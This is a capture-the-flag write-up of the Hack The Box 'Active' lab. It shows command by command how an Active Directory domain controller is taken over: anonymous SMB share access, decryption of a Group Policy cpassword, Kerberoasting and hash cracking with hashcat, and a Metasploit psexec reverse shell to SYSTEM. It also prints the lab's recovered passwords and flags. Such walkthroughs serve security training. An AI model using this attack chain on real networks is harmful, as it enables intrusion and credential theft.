Active
Posted Updated 
https://www.hackthebox.com/achievement/machine/595651/148
By Shivendra Prajapati
12 min read
Port Scan Results ⤵️
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
┌──(kali㉿kali)-[~/Downloads/HTB/Active]
└─$ sudo nmap -sC -sV -p- -T4 -oN Nmap_results.txt 10.10.10.100
Starting Nmap 7.94 ( https:/nmap.org ) at 2023-08-07 14:43 IST
Nmap scan report for 10.10.10.100
Host is up (0.17s latency).
Not shown: 65512 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-08-07 09:21:08Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
49170/tcp open msrpc Microsoft Windows RPC
49171/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
SMB Enumeration ⤵️
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(kali㉿kali)-[~/Downloads/HTB/Active]
└─$ smbclient -L /10.10.10.100/
Password for [WORKGROUP\kali]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Lets get the SMB shares file system →
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(kali㉿kali)-[~/Downloads/HTB/Active]
└─$ smbclient -N \\\\10.10.10.100\\Replication
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
active.htb D 0 Sat Jul 21 16:07:44 2018
5217023 blocks of size 4096. 278613 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> ls
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
Groups.xml A 533 Thu Jul 19 02:16:06 2018
5217023 blocks of size 4096. 278613 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> more Group.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
Now I got credentials →
1
2
userName = "active.htb\SVC_TGS"
cpassword = "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
In the above SMB share we have seen the content of the Replication folder in which in this instance contains the same information regarding Group Policy that SYSVOL will have , and since it contains the Groups.xml file which has cpassword value so lets decrypt this key through gpp-decrypt preinstalled tool in kali.
1
2
3
┌──(kali㉿kali)-[~/Downloads/HTB/Active]
└─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
Now I got the decrypted password as : GPPstillStandingStrong2k18
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
┌──(kali㉿kali)-[~/Downloads/HTB/Active]
└─$ smbclient \\\\10.10.10.100\\Users -U 'SVC_TGS'
Password for [WORKGROUP\SVC_TGS]:
Try "help" to get a list of possible commands.
smb: \> ls -al
NT_STATUS_NO_SUCH_FILE listing \-al
smb: \> ls
. DR 0 Sat Jul 21 20:09:20 2018
.. DR 0 Sat Jul 21 20:09:20 2018
Administrator D 0 Mon Jul 16 15:44:21 2018
All Users DHSrn 0 Tue Jul 14 10:36:44 2009
Default DHR 0 Tue Jul 14 12:08:21 2009
Default User DHSrn 0 Tue Jul 14 10:36:44 2009
desktop.ini AHS 174 Tue Jul 14 10:27:55 2009
Public DR 0 Tue Jul 14 10:27:55 2009
SVC_TGS D 0 Sat Jul 21 20:46:32 2018
5217023 blocks of size 4096. 278803 blocks available
smb: \> cd SVC_TGS\
smb: \SVC_TGS\> ls
. D 0 Sat Jul 21 20:46:32 2018
.. D 0 Sat Jul 21 20:46:32 2018
Contacts D 0 Sat Jul 21 20:44:11 2018
Desktop D 0 Sat Jul 21 20:44:42 2018
Downloads D 0 Sat Jul 21 20:44:23 2018
Favorites D 0 Sat Jul 21 20:44:44 2018
Links D 0 Sat Jul 21 20:44:57 2018
My Documents D 0 Sat Jul 21 20:45:03 2018
My Music D 0 Sat Jul 21 20:45:32 2018
My Pictures D 0 Sat Jul 21 20:45:43 2018
My Videos D 0 Sat Jul 21 20:45:53 2018
Saved Games D 0 Sat Jul 21 20:46:12 2018
Searches D 0 Sat Jul 21 20:46:24 2018
5217023 blocks of size 4096. 278803 blocks available
smb: \SVC_TGS\> cd Desktop
smb: \SVC_TGS\Desktop\> ls
. D 0 Sat Jul 21 20:44:42 2018
.. D 0 Sat Jul 21 20:44:42 2018
user.txt AR 34 Wed Aug 9 09:44:14 2023
5217023 blocks of size 4096. 278803 blocks available
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
I got users.txt file →
1
c83e7e6adf44f7e0fef6f206da497b07
Now for Adminstrative Access I need to have enumerate Kerberos Tickets for that →
We can use Impacket is GetSPNusers.py script to gather any Kerberos tickets.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(kali㉿kali)-[~/Downloads/HTB/Active]
└─$ locate GetUserSPNs.py
/usr/share/doc/python3-impacket/examples/GetUserSPNs.py
┌──(kali㉿kali)-[~/Downloads/HTB/Active]
└─$ cp /usr/share/doc/python3-impacket/examples/GetUserSPNs.py .
┌──(kali㉿kali)-[~/Downloads/HTB/Active]
└─$ python3 GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -k -request -dc-ip 10.10.10.100
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] CCache file is not found. Skipping...
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation]
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-19 00:36:40.351723 2023-08-09 09:44:25.256547
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$ee302fdc44d924c812d4dbf4951e55ea$7fff363327a1bb30080575162ddde50d0667e954bcdeac1c4eb7cc6b60dfbbb1e90fd767a4d8782bbed2df4535e8291c898a43df3a0604520d099b2dcca534cf81c149443dad09fc8d91dbbec4dfcbfd5e40fc0ac390c426c0f829e93a99a832c554fc5f13e6e6c82fd09e6f59ebe4962c8fa0f961609f218bf65bdf71d647ee3aee63d4bc0d1d3992ff82a80ede35480167e5bdfa7b80c874d89f5bae0ff939d2e94d681bebb14691e9a269a617fa1990bf0e623d0434f27c2d80a7fcf823b71ce0eed731ead6d175a77cfc8cb05e711461ebd010b05890350ca1aed881804391126aa752fa70bddd40f81dc20804dcd243fc0f52eab97cb4656d3eff6b8a6b01dbbb8c59a0f752da3ff0fccd885ea56d02d11fa415902094e07cb305ee93767e49f840467075037f9349850189aede15509d941253d2f0d7382a062c64728eee30ed608e6861af93f9e93ebacda4846f414f55cbf29dd03eed14311024b31c0ebf78687cde98658f7cb46ddf66514e665aa3a42d48201122d3642ab9851d10c7dbe5a0fe54280068e8345585ae6dec4b7eb58e8a21ef6c1c8b271a9af0f130fd0afbe32e9e577115aa71b083a72bb231d37c10688817256cd958a790d80a994071065c00e4b3a3a706ea86c255ad3e29c2f05cf9b34ae42d8f866ca113f88e6847016dd3176d6869fb971d53be88f34fa31b77fc4ba9b929f542ba57435038955fcf06e40ad57437645f67ee1a84031b05e76316f637568de086b3422f1748fa8c4b63876694c4674b57d5b1be6a6e08a13d69d226aa1448a102da2fe7dc95bd4647b54ba400b4d6b85284c1349ae2cc8649b683e092ed0199beae9b86b2a478ee4e1ce1b2c655fb22d631a3720ba2e8f7cdfd11a27327d9fffb7015c1172de1371606d930384e231a8da9a5d6cef86689d0d642c185bed89292ada9eef434b2a9608550976ca3c4da449a7228f64127d00e7ed144a05485f7680b20e79d8f1cb21a6bace1b648fb54017d76d9b00f25181bc1bcef368497cd1459e86ee2bc988d4c82fd2183c6f0c999a4543370e3b838a60bbc694feceda08a812091cfa18d7224276adb520c79c5af3d49b393a358c567c5427596d22f8bbda433b776b9b355f4fb4b6aed914dfff32402adc81a98c8a2e5c01d42e8fa7ed7eb6bd845f69e916c63da059f4e5fc3d6839d29ef7c6a3f8fac310ea8773a852e86bff3503dc1e8bff5010b6981369a49000e401ae34336f487e076846a9abe
Now Lets crack this Ticket value and get the password what I wanted →
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
┌──(kali㉿kali)-[~/Downloads/HTB/Active]
└─$ hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 3.1+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
...
...
* Create more work items to make use of your parallelization power:
https:/hashcat.net/faq/morework
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$acb5a62add6835d58aa8fd01c863930c$c2e917f5e50ca6fbae799bcf10ebbe580415dbd539d68d80ce3448b26311a4b3c4dd28fa006edfb9de58c05382f42646fdc4bc1c9a19bbc3b963145b8fe67054f67538e33d2f2e531ac642e1867be1d3e292657382bcd2addac9d9f29e7ddc8c515ddba055a06c4a6102032dddd446a4a5d23b07fcbbf7510b4caf13b032bfcfe6dbafb75bcdc908e6deffb6f78dadb49d087b7f8914f37f1433dc272065eab015d81d6220a883ad25179e2c07d0be3bacf832df1884b3ed046b279549c6af5798ed6abeb08b94dffaa8127c81fd2417633edf853edc541b58e9a1792b904cae05f3af11c9b73ebb018741edd5d20c88553cb7ca614995cfed81048e05f90f5666d428aef7692c02b091a519d4cabc499ecd6b025c9f5740f0d240e5959b58bf0da5e02d10d5ba508c19f493fa69d5b59a76b535b9d8da0ded57a1393bda790f2877a4517ceca6212371d2bb25fe48eda582c39d0dedf706ccd15fbdd76ceca8a0068f9d0ae567d845538170e1135270949672f52b3ca2f63951bb077d8c95f787320fe00cd4c912feef706f57bd73ec12497dc4a97fb3997cef20eb841333b3567322247dd7c0b8d31b1aa1f1726274b56b994a416d74bd1555ead7567c0b5e2e9127072ed8f0ca3bbbfb7ff8aa20c7a5e42da855c9b4a64fba54994fe6ad1183b7588a60d6113ce65b1f5a9072732239091ef2be3183c89ea8458a5aa3775605f1994e723e4b19a2b753b8bba8031209757bf39b11d7cd054b62c20e59e39eb863a91b37dadf1b38f66360da2230bcbc0bc37b8c1e4530e023d95eb771f96135b000b7da40182dc2a54b733e52f678476a8436a3b8489dc45407a731fd909be001119ea22c5293c19815756e425256fc8c012db0df4034486925e9ed927473eaed76bcedd7f1c576cb51eeebc7488908e7b11aae3603b2aa25c245e2b59381d531fef7db22c6daf3bba078cc7dc6f6dcd62079e619e79d66ef9997f21be30b0f4ceeabb42ad18182a8fb115a6d07885b164194921ee46e09a5e91c8f7ab07747902b62afc2ef868469d754a581ab9cc33b09ba6c7d3d7ac433c63e31c325caba3a915577ae64a7006e1c6de1e6697d516a4ba6e0a5c253e245077842401be5ca1823dae75c931c0f1a9948cb2ce9da623ab25fad00f10cc684c1a32dfa53069c6bea1452136f373398470220337f3ac25356f9851219938e42ea96ab4d4f8fc5e522fbd3a28f3735c2193297b1864973a468d728a8ae15e000:Ticketmaster1968
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...15e000
Time.Started.....: Wed Aug 9 13:31:15 2023 (18 secs)
Time.Estimated...: Wed Aug 9 13:31:33 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 561.8 kH/s (1.46ms) @ Accel:512 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10537984/14344385 (73.46%)
Rejected.........: 0/10537984 (0.00%)
Restore.Point....: 10536960/14344385 (73.46%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Tiffany95 -> ThruJasonK21
Hardware.Mon.#1..: Util: 77%
Started: Wed Aug 9 13:30:50 2023
Stopped: Wed Aug 9 13:31:34 2023
Now I got the password : Ticketmaster1968 , lets get into the shell using these credentials through metasploit →
Now lets use this module named as smb/psexec for the shell →
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
msf6 exploit(windows/smb/psexec) > options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.10.100 yes The target host(s), see https:/docs.metasploit.com/docs/using-metasploit
/basics/using-metasploit.html
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain active.htb no The Windows domain to use for authentication
SMBPass Ticketmaster1968 no The password for the specified username
SMBSHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) or a norma
l read/write folder share
SMBUser Administrator no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.94 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/psexec) >
Now it time for exploit ⤵️
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
msf6 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 10.10.14.94:4444
[*] 10.10.10.100:445 - Connecting to the server...
[*] 10.10.10.100:445 - Authenticating to 10.10.10.100:445|active.htb as user 'Administrator'...
[*] 10.10.10.100:445 - Selecting PowerShell target
[*] 10.10.10.100:445 - Executing the payload...
[+] 10.10.10.100:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 10.10.10.100
[*] Meterpreter session 1 opened (10.10.14.94:4444 -> 10.10.10.100:49896) at 2023-08-09 13:36:47 +0530
meterpreter > sysinfo
Computer : DC
OS : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : el_GR
Domain : ACTIVE
Logged On Users : 1
Meterpreter : x86/windows
meterpreter >
meterpreter > pwd
C:\Windows\system32
meterpreter > cd ../../
meterpreter > dir
Listing: C:\
============
Mode Size Type Last modified Name]
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2009-07-14 08:04:39 +0530 $Recycle.Bin
040777/rwxrwxrwx 0 dir 2009-07-14 10:36:44 +0530 Documents and Settings
040777/rwxrwxrwx 0 dir 2009-07-14 08:50:08 +0530 PerfLogs
040555/r-xr-xr-x 4096 dir 2022-01-12 18:41:58 +0530 Program Files
040555/r-xr-xr-x 4096 dir 2021-01-21 22:19:16 +0530 Program Files (x86)
040777/rwxrwxrwx 4096 dir 2022-01-12 18:39:27 +0530 ProgramData
040777/rwxrwxrwx 0 dir 2018-07-16 15:43:22 +0530 Recovery
040777/rwxrwxrwx 4096 dir 2018-07-19 00:15:01 +0530 System Volume Information
040555/r-xr-xr-x 4096 dir 2018-07-21 20:09:20 +0530 Users
040777/rwxrwxrwx 16384 dir 2023-08-09 10:31:43 +0530 Windows
000000/--------- 0 fif 1970-01-01 05:30:00 +0530 pagefile.sys
meterpreter > cd Users
meterpreter > dir
Listing: C:\Users
=================
Mode Size Type Last modified Name]
---- ---- ---- ------------- ----
040777/rwxrwxrwx 8192 dir 2018-07-16 15:44:21 +0530 Administrator
040777/rwxrwxrwx 0 dir 2009-07-14 10:36:44 +0530 All Users
040555/r-xr-xr-x 8192 dir 2009-07-14 12:08:21 +0530 Default
040777/rwxrwxrwx 0 dir 2009-07-14 10:36:44 +0530 Default User
040555/r-xr-xr-x 4096 dir 2009-07-14 10:27:55 +0530 Public
040777/rwxrwxrwx 4096 dir 2018-07-21 20:46:32 +0530 SVC_TGS
100666/rw-rw-rw- 174 fil 2009-07-14 10:27:55 +0530 desktop.ini
meterpreter > cd Administrator\\
meterpreter > ls
Listing: C:\Users\Administrator
===============================
Mode Size Type Last modified Name]
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2018-07-16 15:44:15 +0530 AppData
040777/rwxrwxrwx 0 dir 2018-07-16 15:44:15 +0530 Application Data
040555/r-xr-xr-x 0 dir 2018-07-30 19:20:10 +0530 Contacts
040777/rwxrwxrwx 0 dir 2018-07-16 15:44:15 +0530 Cookies
040555/r-xr-xr-x 0 dir 2021-01-21 22:19:47 +0530 Desktop
040555/r-xr-xr-x 4096 dir 2018-07-30 19:20:10 +0530 Documents
040555/r-xr-xr-x 0 dir 2021-01-21 22:22:32 +0530 Downloads
040555/r-xr-xr-x 0 dir 2018-07-30 19:20:10 +0530 Favorites
040555/r-xr-xr-x 0 dir 2018-07-30 19:20:10 +0530 Links
040777/rwxrwxrwx 0 dir 2018-07-16 15:44:15 +0530 Local Settings
040555/r-xr-xr-x 0 dir 2018-07-30 19:20:10 +0530 Music
040777/rwxrwxrwx 0 dir 2018-07-16 15:44:15 +0530 My Documents
100666/rw-rw-rw- 524288 fil 2023-08-09 09:44:25 +0530 NTUSER.DAT
100666/rw-rw-rw- 65536 fil 2018-07-16 15:44:15 +0530 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw- 524288 fil 2018-07-16 15:44:15 +0530 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer0000000
0000000000001.regtrans-ms
100666/rw-rw-rw- 524288 fil 2018-07-16 15:44:15 +0530 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer0000000
0000000000002.regtrans-ms
040777/rwxrwxrwx 0 dir 2018-07-16 15:44:15 +0530 NetHood
040555/r-xr-xr-x 0 dir 2018-07-30 19:20:10 +0530 Pictures
040777/rwxrwxrwx 0 dir 2018-07-16 15:44:15 +0530 PrintHood
040777/rwxrwxrwx 0 dir 2018-07-16 15:44:15 +0530 Recent
040555/r-xr-xr-x 0 dir 2018-07-30 19:20:10 +0530 Saved Games
040555/r-xr-xr-x 0 dir 2018-07-30 19:20:10 +0530 Searches
040777/rwxrwxrwx 0 dir 2018-07-16 15:44:15 +0530 SendTo
040777/rwxrwxrwx 0 dir 2018-07-16 15:44:15 +0530 Start Menu
040777/rwxrwxrwx 0 dir 2018-07-16 15:44:15 +0530 Templates
040555/r-xr-xr-x 0 dir 2018-07-30 19:20:10 +0530 Videos
100666/rw-rw-rw- 262144 fil 2023-08-09 10:31:43 +0530 ntuser.dat.LOG1
100666/rw-rw-rw- 0 fil 2018-07-16 15:44:09 +0530 ntuser.dat.LOG2
100666/rw-rw-rw- 20 fil 2018-07-16 15:44:15 +0530 ntuser.ini
meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Users\Administrator\Desktop
=======================================
Mode Size Type Last modified Name]
---- ---- ---- ------------- ----
100666/rw-rw-rw- 282 fil 2018-07-30 19:20:10 +0530 desktop.ini
100444/r--r--r-- 34 fil 2023-08-09 09:44:14 +0530 root.txt
meterpreter > cat root.txt
c8a0d7e6349f05d8b41db241dfeb84ff
meterpreter >
meterpreter > shell
Process 2848 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\Administrator\Desktop>whoami
whoami
nt authority\system
If you have any questions or suggestions, please leave a comment below. Thank You !
This post is licensed under CC BY 4.0 by the author.